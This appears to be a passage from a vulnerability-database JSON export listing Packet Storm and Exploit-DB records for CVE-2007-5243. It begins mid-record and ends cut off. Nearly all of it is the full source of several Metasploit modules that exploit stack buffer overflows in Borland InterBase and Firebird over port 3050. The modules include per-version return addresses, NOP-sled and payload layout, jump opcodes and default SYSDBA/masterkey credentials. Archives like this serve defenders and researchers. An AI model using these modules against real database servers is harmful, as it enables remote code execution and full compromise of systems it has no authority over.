ret \n[ \n'Borland InterBase WI-V6.5.0.28', \n{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x0040390d } \n], \n# 0x00403901 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.1.6', \n{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x00403901 } \n], \n# 0x004038b1 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0', \n{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x004038b1 } \n], \n# 0x00404a10 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.5.0.742', \n{ 'Length' => [ 1432, 1436 ], 'Ret' => 0x00404a10 } \n], \n# 0x00404a0e pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.1.1.680', \n{ 'Length' => [ 1336, 1340 ], 'Ret' => 0x00404a0e } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 1336 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Create database \nop_create = 20 \n \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_create].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-1028].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Database parameter block \n \n# Length \nbuf << [1024].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024) \n \nsock.put(buf) \n \nsleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://packetstormsecurity.com/files/download/83069/ib_isc_create_database.rb.txt"}, {"lastseen": "2016-12-05T22:22:31", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Firebird Relational Database SVC_attach() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83097", "href": "https://packetstormsecurity.com/files/83097/Firebird-Relational-Database-SVC_attach-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Firebird Relational Database SVC_attach() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted service attach request. 
\n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38605' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 256, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# 0x0040230b pop ebp; pop ebx; ret \n[ \n'Firebird WI-V1.5.3.4870 WI-V1.5.4.4910', \n{ 'Length' => [ 308 ], 'Ret' => 0x0040230b } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 308 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 1 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Attach database \nop_attach = 19 \n \n# Create database \nop_create = 20 \n \n# Service attach \nop_service_attach = 82 \n \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_service_attach].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-260].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Database parameter block \n \n# Length \nbuf << [1024].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024) \n \nsock.put(buf) \n \n#sleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83097/fb_svc_attach.rb.txt"}, {"lastseen": "2016-12-05T22:11:37", "description": "", "published": "2009-10-27T00:00:00", "type": "packetstorm", "title": "Borland InterBase PWD_db_aliased() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-10-27T00:00:00", "id": "PACKETSTORM:82246", "href": "https://packetstormsecurity.com/files/82246/Borland-InterBase-PWD_db_aliased-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Borland InterBase PWD_db_aliased() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted attach request. 
\n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38607' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n}, \n'Targets' => \n[ \n# 0x0804cbe4 pop esi; pop ebp; ret \n[ \n'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253', \n{ 'Ret' => 0x0804cbe4 } \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit \n \nconnect \n \n# Attach database \nop_attach = 19 \n \nlength = 1152 \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_attach].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# It will return into this nop block \nbuf << make_nops(length - payload.encoded.length - 4) \n \n# Payload \nbuf << payload.encoded \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Length \nbuf << [1024].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024) \n \nsock.put(buf) \n \nhandler \n \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82246/ib_pwd_db_aliased.rb.txt"}, {"lastseen": "2016-12-05T22:15:16", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Borland InterBase SVC_attach() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83227", "href": 
"https://packetstormsecurity.com/files/83227/Borland-InterBase-SVC_attach-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Borland InterBase SVC_attach() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted service attach request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38605' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# 0x00403d4b pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.1.0.257', \n{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4b } \n], \n# 0x00403d4d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.0.0.123', \n{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4d } \n], \n# 0x00403a5d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80', \n{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403a5d } \n], \n# 0x004038fd pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.0.1.1', \n{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x004038fd } \n], \n# 0x0040390d pop esi; pop ebp; ret \n[ \n'Borland InterBase 
WI-V6.5.0.28', \n{ 'Length' => [ 2116, 2120], 'Ret' => 0x0040390d } \n], \n# 0x00403901 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.1.6', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403901 } \n], \n# 0x004038b1 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038b1 } \n], \n# 0x00404a10 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.5.0.742', \n{ 'Length' => [ 2216, 2120 ], 'Ret' => 0x00404a10 } \n], \n# 0x00404a0e pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.1.1.680', \n{ 'Length' => [ 2120, 2124 ], 'Ret' => 0x00404a0e } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 2120 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Attach database \nop_attach = 19 \n \n# Create database \nop_create = 20 \n \n# Service attach \nop_service_attach = 82 \n \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_service_attach].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-1028].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Database parameter block \n \n# Length \nbuf << [1024].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024) \n \nsock.put(buf) \n \nsleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83227/ib_svc_attach.rb.txt"}, {"lastseen": "2016-12-05T22:22:57", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Firebird Relational Database isc_attach_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83201", "href": "https://packetstormsecurity.com/files/83201/Firebird-Relational-Database-isc_attach_database-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Firebird Relational Database isc_attach_database() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted create request. 
\n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38607' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# '\\Device\\HarddiskVolume1\\WINDOWS\\system32\\unicode.nls' \n[ \n'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)', \n{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 1 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \n \n \n# Create database parameter block \ndef dpb_create \nisc_dpb_user_name = 28 \nisc_dpb_password = 29 \n \nisc_dpb_version1 = 1 \n \nuser = 'SYSDBA' \npass = 'masterkey' \n \ndpb = '' \n \ndpb << [isc_dpb_version1].pack('c') \n \ndpb << [isc_dpb_user_name].pack('c') \ndpb << [user.length].pack('c') \ndpb << user \n \ndpb << [isc_dpb_password].pack('c') \ndpb << [pass.length].pack('c') \ndpb << pass \n \ndpb \nend \n \n# Calculate buffer padding \ndef buf_padding(length = '') \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \npadding \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Attach database \nop_attach = 19 \n \n# Extra padding to trigger the exception \nextra_padding = 1024 * 16 \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_attach].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length + extra_padding].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << 
payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-516].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Random alpha data \nbuf << rand_text_alpha(extra_padding) \n \n# Padding \nbuf << \"\\x00\" * buf_padding(length + extra_padding) \n \n# Database parameter block \n \n# Create database parameter block \ndpb = dpb_create \n \n# Database parameter block length \nbuf << [dpb.length].pack('N') \n \n# Database parameter block \nbuf << dpb \n \n# Padding \nbuf << \"\\x00\" * buf_padding(dpb.length) \n \nsock.put(buf) \n \nsleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83201/fb_isc_attach_database.rb.txt"}, {"lastseen": "2016-12-05T22:15:14", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Firebird Relational Database isc_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83238", "href": "https://packetstormsecurity.com/files/83238/Firebird-Relational-Database-isc_create_database-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Firebird Relational Database isc_create_database() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted create request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38606' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# '\\Device\\HarddiskVolume1\\WINDOWS\\system32\\unicode.nls' \n[ \n'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)', \n{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 1 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \n \n \n# Create database parameter block \ndef dpb_create \nisc_dpb_user_name = 28 \nisc_dpb_password = 29 \n \nisc_dpb_version1 = 1 \n \nuser = 'SYSDBA' \npass = 'masterkey' \n \ndpb = '' \n \ndpb << [isc_dpb_version1].pack('c') \n \ndpb << [isc_dpb_user_name].pack('c') \ndpb << [user.length].pack('c') \ndpb << user \n \ndpb << [isc_dpb_password].pack('c') \ndpb << [pass.length].pack('c') \ndpb << pass \n \ndpb \nend \n \n# Calculate buffer padding \ndef buf_padding(length = '') \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \npadding \nend 
\n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Create database \nop_create = 20 \n \n# Extra padding to trigger the exception \nextra_padding = 1024 * 16 \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_create].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length + extra_padding].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-516].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Random alpha data \nbuf << rand_text_alpha(extra_padding) \n \n# Padding \nbuf << \"\\x00\" * buf_padding(length + extra_padding) \n \n# Database parameter block \n \n# Create database parameter block \ndpb = dpb_create \n \n# Database parameter block length \nbuf << [dpb.length].pack('N') \n \n# Database parameter block \nbuf << dpb \n \n# Padding \nbuf << \"\\x00\" * buf_padding(dpb.length) \n \nsock.put(buf) \n \nsleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83238/fb_isc_create_database.rb.txt"}, {"lastseen": "2016-12-05T22:11:38", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Borland InterBase isc_attach_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83151", "href": "https://packetstormsecurity.com/files/83151/Borland-InterBase-isc_attach_database-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. 
Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Borland InterBase isc_attach_database() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted attach request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38607' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# 0x00403d4b pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.1.0.257', \n{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4b } \n], \n# 0x00403d4d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.0.0.123', \n{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4d } \n], \n# 0x00403a5d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80', \n{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403a5d } \n], \n# 0x004038fd pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.0.1.1', \n{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x004038fd } \n], \n# 0x0040390d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.5.0.28', \n{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x0040390d } \n], \n# 0x00403901 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.1.6', \n{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x00403901 } \n], \n# 0x004038b1 pop esi; pop ebp; ret \n[ \n'Borland 
InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0', \n{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x004038b1 } \n], \n# 0x00404a10 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.5.0.742', \n{ 'Length' => [ 1428, 1432 ], 'Ret' => 0x00404a10 } \n], \n# 0x00404a0e pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.1.1.680', \n{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x00404a0e } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 1332 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Attach database \nop_attach = 19 \n \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_attach].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-1028].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Database parameter block \n \n# Length \nbuf << [1024].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024) \n \nsock.put(buf) \n \nsleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83151/ib_isc_attach_database.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-01T23:49:47", "description": "Firebird Relational Database SVC_attach() Buffer Overflow. CVE-2007-5243. 
Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Firebird Relational Database SVC_attach Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16420", "href": "https://www.exploit-db.com/exploits/16420/", "sourceData": "##\r\n# $Id: fb_svc_attach.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Firebird Relational Database SVC_attach() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted service attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38605' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 256,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 
